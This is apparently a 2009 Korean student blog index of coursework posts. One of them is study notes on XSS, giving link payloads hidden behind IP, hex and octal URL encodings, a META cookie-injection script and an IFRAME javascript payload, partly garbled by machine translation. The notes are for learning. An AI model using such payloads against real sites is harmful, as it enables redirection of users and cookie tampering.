정보처리기사 실기 07 ~ 09 1회 까지

전공 공부/학교 수업 2009.06.26 17:55

네트웍 실습

전공 공부/학교 수업 2009.06.13 15:39

Libpcap

시분 프로젝트

전공 공부/학교 수업 2009.05.06 14:04

연습문제 DB

전공 공부/학교 수업 2009.04.27 16:34

DB

전공 공부/학교 수업 2009.04.20 11:51

DB

전공 공부/학교 수업 2009.04.20 01:51
SQL 몇 개

XSS

전공 공부/학교 수업 2009.04.17 02:50

1.IP XSS

 

구글에서 검색할 때 문자에 링크된 페이지를 (XXS,XXS 관련)을 IP주소로 연결시킬 수 있다. 프록시 프로그램으로 바꿔주면 사용자는 XXS 관련사이트로 들어 가려다 공격자가 설정해 둔 주소로 이동을 하게 된다.

 

<span onmouseover="_tipon(this)" onmouseout="_tipoff()"><span class="google-src-text" style="direction: ltr; text-align: left"><A HREF="http://66.102.7.147/">XSS</A></span> 은 <A HREF="http://66.102.7.147/"> XSS 관련 </></span>

 

2.URL XSS

 

구글에서 검색할 때 문자에 링크된 페이지를 (XXS,XXS 관련)을 URL주소로 연결시킬 수 있다. 프록시 프로그램으로 바꿔주면 사용자는 XXS 관련사이트로 들어 가려다 공격자가 설정해 둔 주소로 이동을 하게 된다.

 

<span onmouseover="_tipon(this)" onmouseout="_tipoff()"><span class="google-src-text" style="direction: ltr; text-align: left"><A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A></span> 은 <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"> XSS 관련 </></span>

 

 

3.8진법 인코딩

 

구글에서 검색할 때 문자에 링크된 페이지를 (XXS,XXS 관련)을 8진법으로 된 사이트에 연결시킬 수 있다. 프록시 프로그램으로 바꿔주면 사용자는 XXS 관련사이트로 들어 가려다 공격자가 설정해 둔 주소로 이동을 하게 된다.

 

<span onmouseover="_tipon(this)" onmouseout="_tipoff()"><span class="google-src-text" style="direction: ltr; text-align: left"><A HREF="http://0102.0146.0007.00000223/">XSS</A></span> 은 <A HREF="http://0102.0146.0007.00000223/"> XSS 관련 </></span>

 

 

 

 

 

 

 

 

 

 

 

4.쿠키 조작

 

쿠키의 내용을 덮어 쓸 수 있다. 쿠키의 페이지를 방문하는 사용자에게만 표시되로록 저장되어 있는 데이터베이스에 사용자 정보를 가져와 조작이 가능하다.

 

<span onmouseover="_tipon(this)" onmouseout="_tipoff()"><span class="google-src-text" style="direction: ltr; text-align: left"><META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"></span> <메타는 HTTP - EQUIV = "세트 - 쿠키"내용 = "아이디 = <SCRIPT> 알림 ( 'XSS 관련') </ SCRIPT>"></span>

 

 

 

5. IFRAME XSS

 

 

Iframe 태그를 이용 악성코드가 포함된 사이트로 세션을 연결

 

<span onmouseover="_tipon(this)" onmouseout="_tipoff()"><span class="google-src-text" style="direction: ltr; text-align: left"><IFRAME SRC="javascript:alert('XSS');"></IFRAME></span>

 

 

 

연습문제 4, 2-13,2-14

전공 공부/학교 수업 2009.04.13 15:57

네트워크 프로그래밍

전공 공부/학교 수업 2009.04.07 17:56


sudo /etc/init.d/networking restart

sudo vim /etc/resolv.conf  (DNS 설정)

sudo vim /etc/network/interfaces Ubuntu 네트워크 설정

시분설 문제

전공 공부/학교 수업 2009.03.31 17:40


티스토리 툴바